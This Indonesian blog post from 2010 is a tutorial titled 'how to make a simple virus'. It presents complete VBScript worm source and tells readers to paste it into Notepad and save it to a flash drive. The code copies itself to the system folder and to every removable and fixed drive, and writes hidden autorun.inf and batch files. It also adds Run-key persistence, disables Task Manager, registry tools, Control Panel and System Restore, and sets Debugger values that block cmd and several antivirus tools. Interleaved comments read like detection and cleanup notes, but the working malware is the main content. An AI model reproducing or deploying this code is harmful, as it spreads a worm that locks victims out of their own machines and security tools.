Saturday, July 31, 2010

Cara Membuat Virus Sederhana


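Bagi Anda yang ingin coba-coba membuat virus, nih saya berikan contoh membuat virus sederhana dengan Notepad. Kode di bawah ini adalah VBScript yang dijalankan oleh Windows Script Host: ia menyalin dirinya ke folder sistem Windows dan ke drive bertipe removable maupun fixed, menulis autorun.inf di drive tersebut, lalu mengubah sejumlah nilai registry (kunci Run, kebijakan Explorer/System, dan Image File Execution Options). Coba perhatikan kode di bawah ini: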





' Analysis note: every runtime error from here on is suppressed, so failed
' file or registry operations (missing file, insufficient rights) produce no
' visible message and the script simply continues.
on error resume next
dim rekur,syspath,windowpath,desades,shadow2,mf,isi,isi2,tf,shadow1,nt,check,sd

' Payload strings written to disk later in the script:
'   isi  - autorun.inf content pointing at the dropped batch file
'   isi2 - plain text written into the .rtf decoy files
'   isi3 - batch file content that starts the dropped .vbs and .rtf
' The literal file names and text below are usable as search strings when
' triaging a removable drive.
isi = "[autorun]" & vbcrlf & "shellexecute=SD™.bat"
isi2 = "blog gecok" & vbcrlf & "gecok blog" & vbcrlf & "blog gecok..." & vbcrlf & "Angga sayang fina"
isi3 = "@echo off" & vbcrlf & "start SD™_(Angga dan Fina).sys.vbs" & vbcrlf & "start SD™_(Fina dan Angga).rtf" & vbcrlf & "@echo on"
set shadow2 = createobject("Scripting.FileSystemObject")
' mf is the running script's own file on disk.
set mf = shadow2.getfile(wscript.ScriptFullname)
dim text,size
size = mf.size
' check holds the DriveType of the drive the script was started from
' (FileSystemObject: 1 = removable, 2 = fixed). It is read once here and
' controls the outer loop at the end of the script.
check = mf.drive.drivetype
' Open the script's own file for reading (1 = ForReading, -2 = system default
' encoding) and copy it line by line into rekur. rekur is the text that is
' later written out as each copy of the script.
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

' Drops two files into the Windows system folder.
' GetSpecialFolder(0) is the Windows folder, GetSpecialFolder(1) the system folder.
' Host artifacts to look for: <system folder>\windows.sys.vbs and <system folder>\SD2.rtf.
Set windowpath = shadow2.getspecialfolder(0)
Set syspath = shadow2.getspecialfolder(1)
' If a previous copy exists, reset its attributes to 32 (Archive only) so it
' can be overwritten; when the file does not exist the error is suppressed by
' the On Error Resume Next at the top of the script.
set tf = shadow2.getfile(syspath & "\windows.sys.vbs")
tf.attributes = 32
' Write the script's own text (rekur) as the new copy.
set tf = shadow2.createtextfile(syspath & "\windows.sys.vbs",2,true)
tf.write rekur
tf.close
' 39 = ReadOnly (1) + Hidden (2) + System (4) + Archive (32). Files marked
' hidden+system are not listed by Explorer's default view; `dir /a` or
' `attrib` will show them during cleanup.
set tf = shadow2.getfile(syspath & "\windows.sys.vbs")
tf.attributes = 39

' Same sequence for the decoy text file SD2.rtf, filled with isi2.
Set windowpath = shadow2.getspecialfolder(0)
Set syspath = shadow2.getspecialfolder(1)
set tf = shadow2.getfile(syspath & "\SD2.rtf")
tf.attributes = 32
set tf = shadow2.createtextfile(syspath & "\SD2.rtf",2,true)
tf.write isi2
tf.close
set tf = shadow2.getfile(syspath & "\SD2.rtf")
tf.attributes = 39


' Walks every drive known to the FileSystemObject. The condition below selects
' drives whose DriveType is 1 (removable) or 2 (fixed) and skips A:.
' For incident scoping this means any USB storage attached while the script is
' running, and every local fixed volume, should be checked for the dropped files.
for each desades in shadow2.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then

set tf=shadow2.getfile(desades.path &"\SD™_(Fina dan Angga).sys.vbs")
tf.attributes =32
set tf=shadow2.createtextfile(desades.path &"\SD™_(




























Fina dan Angga
















).sys.vbs",2,true)
tf.write rekur
tf.close
set tf=shadow2.getfile(desades.path &"\SD™_(




























Fina dan Angga
















).sys.vbs")
tf.attributes = 39

' Writes autorun.inf (content: isi) to the root of the selected drive, then
' marks it ReadOnly+Hidden+System+Archive (39). Any existing autorun.inf on
' the drive is overwritten.
' Defensive note: a hidden/system autorun.inf in a drive root whose
' shellexecute= line names a script or batch file is a long-standing worm
' indicator. Current Windows versions do not act on autorun.inf commands for
' USB storage by default; older or reconfigured hosts may.
set tf =shadow2.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=shadow2.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = shadow2.getfile(desades.path &"\autorun.inf")
tf.attributes=39

' Writes the batch file named in autorun.inf (content: isi3) to the same drive
' root with the same attribute handling.
set tf=shadow2.getfile(desades.path &"\SD™.bat")
tf.attributes =32
set tf=shadow2.createtextfile(desades.path &"\SD™.bat",2,true)
tf.write isi3
tf.close
set tf=shadow2.getfile(desades.path &"\SD™.bat")
tf.attributes = 39

set tf =shadow2.getfile(desades.path &"\SD™_(




























Fina dan Angga
















).rtf")
set tf=shadow2.createtextfile(desades.path &"\SD™_(



























Fina dan Angga
















).rtf",2,true)
tf.write isi2
tf.close
set tf = shadow2.getfile(desades.path &"\SD™_(




























Fina dan Angga
















).rtf")
end if
next

' Registry changes made through WScript.Shell.RegWrite.
' HKEY_LOCAL_MACHINE writes normally need administrative rights; because
' errors are suppressed, a failed write leaves no trace in the script's
' behaviour. Each value written below is a host indicator to check (and
' remove) during remediation.
set shadow1 = createobject("WScript.Shell")

' Internet Explorer window title text.
shadow1.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: SD For EVER!!! ::"

' Entries under Explorer's RunMRU key (the Run dialog history list).
shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "angga dan fina"
shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "a"

' LegalNoticeCaption / LegalNoticeText values written at the path shown.
shadow1.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "angga dan fina"
shadow1.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "angga dan fina selamanya. . ."

' Persistence: two values under the machine-wide Run key, named SD1 and SD2,
' pointing at the files dropped in the system folder. Run-key values that
' reference a .vbs in the system folder are a strong detection signal.
shadow1.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SD2", syspath & "\SD2.rtf"
shadow1.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SD1", syspath & "\windows.sys.vbs"
' Replaces the Internet Explorer start page.
shadow1.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.facebook.com/home.php?#!/profile.php?id=100000330196652"

' Policy values written as REG_DWORD. Judging by their names they hide or
' disable the tools a user would reach for to inspect or undo the changes:
' Find, Folder Options, Run, registry editing tools, context menus, wallpaper
' change, Windows-key shortcuts, System Restore, Log Off, Control Panel and
' Task Manager.
' Remediation note: these values have to be deleted (or set to 0), typically
' from an unaffected administrative context, before the built-in tools respond
' normally again. Several of them set together is itself a useful detection
' heuristic.
' NOTE(review): the first value is written under ...\Policies\Explorer\Advanced;
' its effect is not established by anything on this page.
shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "0", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"



' Creates a Debugger value under Image File Execution Options (IFEO) for a list
' of executables: the command prompt, registry editors, msconfig, generic
' installer names, and several antivirus / removal tools (PCMAV, ANSAV, Smadav,
' viremoval/viremover).
' IFEO Debugger values redirect process launches and are a well-known tamper
' point for disabling security and administration tools. Here the value is an
' empty string; the resulting behaviour is not established by this page.
' Detection note: any Debugger value under IFEO for these image names should be
' treated as suspicious; monitoring writes to this key catches the technique
' regardless of the data written. Cleanup consists of deleting the Debugger
' values (or the per-image subkeys this script created).
shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Smadav.exe\Debugger",""


' End of the outer do ... loop. check was read once at start-up (DriveType of
' the drive the script runs from) and is never reassigned in the visible code,
' so when the script runs from anything other than a removable drive the loop
' never ends: the file drops and registry writes above repeat after each 20 ms
' pause.
' Remediation note: the hosting script-engine process has to be terminated
' before files or registry values are cleaned, otherwise they are rewritten
' almost immediately.
if check <> 1 then
Wscript.sleep 20
end if
loop while check <> 1
' Reached only when the script was started from a removable drive (check = 1):
' after a single pass it opens an Explorer window with the script file selected.
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname


































Copy Lalu pastekan ke dalam notepad anda, lalu save yang ingin di berikan virus. Contoh nya save as pada flashdisk anda. Jangan lupa aktifkan antivirus sebelum anda mempraktekannya.
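Script ini sengaja tidak diberikan autorun, tanya kenapa? Dijawab kenapa, hehe. (Catatan: kode di atas tetap menulis berkas autorun.inf berisi `shellexecute=SD™.bat` ke root setiap drive bertipe 1 atau 2 selain A:, jadi pernyataan "tanpa autorun" hanya berlaku untuk salinan awal yang Anda simpan sendiri.)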
Baca juga ini.
